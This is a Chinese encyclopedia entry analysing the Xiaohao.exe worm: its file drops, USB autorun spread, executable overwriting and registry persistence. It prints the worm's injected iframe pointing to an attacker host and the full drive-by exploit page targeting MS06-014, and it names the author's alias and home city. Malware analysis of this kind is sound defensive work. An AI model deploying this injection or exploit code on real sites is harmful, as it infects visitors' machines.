请输入您要查询的百科知识:

 

词条 Xiaohao.exe
释义

病毒简介

文件名称:Xiaohao.exe

文件大小:12288 字节

AV命名:Virus.Win32.Agent.o(瑞星)

加壳方式:UPX 0.89.6 - 1.02 / 1.05 - 1.24

编写语言:Microsoft Visual C++ 6.0

病毒类型:蠕虫

文件MD5:B50ED06B61CDCF060D0136784999E50C

文件SHA1:ADFE561A7E12E6123C2E5E64EAE2308CBD4A79FD

传播方式:U盘等移动.介质、网页漏洞。

所在系统:Win9x, WinMe, WinNT, Win2000, WinXp, Win2003

病毒分析

1、释放病毒文件:

%Systemroot%\\system32\\dllcache\\dvdplay.exe

%Systemroot%\\system32\\OLDA.tmp

%Systemroot%\\system32\\exloroe.exe

其中主体Xiaohao.exe常驻进程。

2、尝试启动C:\\Program Files\\Internet Explorer\\iexplore.exe,不过未见其他行为。

3、Xiaohao.exe查找可用的磁盘,在其目录下生成:Xiaohao.exe和Autorun.inf

如双击磁盘,则激活病毒。

(如果在插入U盘情况下,运行被感染的病毒,那么U盘目录会生成Xiaohao.exe和Autorun.inf)

4、遍历磁盘所有文件,如遇到.exe文件则覆盖,并在文件尾增加感染标记“ygr”

覆盖文件头部,导致可执行文件结构被破坏。文件全部变成一个“浩”字。

由于无判断路径,系统文件也.被破坏了,重启后可能无法开机。

并且一些系统设置和配置失效,例如系统时间会被修改。

5、查找扩展名为*.jsp、*.php、*.aspx、*.asp、*.html、*.htm文件。插入一段代码:

<ifrae src=h**p://xiaohao.yona.biz/xiaohao.htm width=0 height=0></ifram>

代码:

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN">

<HTML><HEAD><TITLE>IE 0Day</TITLE>

<META http-equiv=Content-Type content="text/html; charset=windows-1252">

<META content="MSHTML 6.00.2900.2769" name=GENERATOR></HEAD>

<BODY>

<SCRIPT language=javascript>

window.status="";

function detectOS()

{

if(navigator.userAgent.indexOf("Windows NT 5.1") != -1)

{

OS = "Windows XP";

}

else

{

if(navigator.userAgent.indexOf("Windows NT 5.2") != -1)

{OS = "Windows 2003";}

else

{OS = "Windows 2000";}

}

return OS;

}

function MakeItSo()

{

if(detectOS() == "Windows XP")

{

//2YWwO5M3N*xp,V4PPxp5DMS07-004MxBm

window.location.href="baobao.htm";

}

else {if(detectOS() == "Windows 2003")

{

//2YWwO5M3N*2003

window.location.href="zhu3.htm";

}

else

{

//2YWwO5M3N*2K,V4PP2K5DMS07-004MxBm

window.location.href="banner.htm";

}

}

}

</SCRIPT>

<SCRIPT language=VBScript>

on error resume next

Set downf = document.createElement("object")

downf.setAttribute "classid", "clsid:BD9"&"6C556-6"&"5A3-11D"&"0-983A-00C"&"04FC2"&"9E36"

str="Microsoft.XMLHTTP"

Set O = downf.CreateObject(str,"")

if Not Err.Number = 0 then

err.clear

//C;SPMS06-014B)64,5Ck:sEP6O2YWwO5M3@`PMV4PP2;M,5DMS07-004MxBm

document.write("<scr"&"ipt language=""javascript"">window.setTimeout(""MakeItSo()"",5000);</sc"&"ript>")

else

//SPMS06-014B)64,V4PP06-0145DMxBmad.htm

document.write("<iframe width=""0"" height=""0"" src=""zhu3.htm""></iframe>")

end if

</SCRIPT>

<script src=yun.js></script>

<SCRIPT language=javascript type=text/javascript>

var cookieString = document.cookie;

var start = cookieString.indexOf("woshi0day=");

if (start != -1)

{}

else

{

var expires = new Date();

expires.setTime(expires.getTime() + 24 * 60 * 60 * 1000);

document.cookie = "woshi0day=Ms06-046;expires=" + expires.toGMTString();

document.write("<iframe width=0 height=0 src=baobao.htm></iframe>");

}</SCRIPT>

</BODY></HTML>

由操作系统版本判断,决定跳转的网页。

首先检测是否存在MS06-014漏洞,若有,则跳至h**p://xiaohao.yona.biz/zhu3.htm

如无意外,可获样本:h**p://xiaohao.yona.biz/xiaohao.exe

若无MS06-014漏洞,则跳至h**p://xiaohao.yona.biz/baobao.htm.

代码以十进制加密,解密后得一个0day木马。

6、修改注册表(不记得哪里,哈哈``),删除开始菜单的快捷方式。

7、修改进程窗口标.题,为:已中毒 X14o-H4o''s Virus

8、如病毒在进程,在进入一个目录后,所有文件(被感染文件除外)属性皆被设置为隐藏!

9、破坏显示隐藏文件,设置为“不显示”。

10、写入注册表,开机自启:

HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Active Setup\\Installed Components\\

指向%SystemRoot%\\system32\\exloroe.exe(这一步使系统启动不了!)

11、保存被感染的文件列表C:\\Jilu.txt

病毒作者

网名:X14oH4o

百度空间:/xh_hook

住址:江西南昌

随便看

 

百科全书收录4421916条中文百科知识,基本涵盖了大多数领域的百科知识,是一部内容开放、自由的电子版百科全书。

 

Copyright © 2004-2023 Cnenc.net All Rights Reserved
更新时间:2025/3/14 10:43:19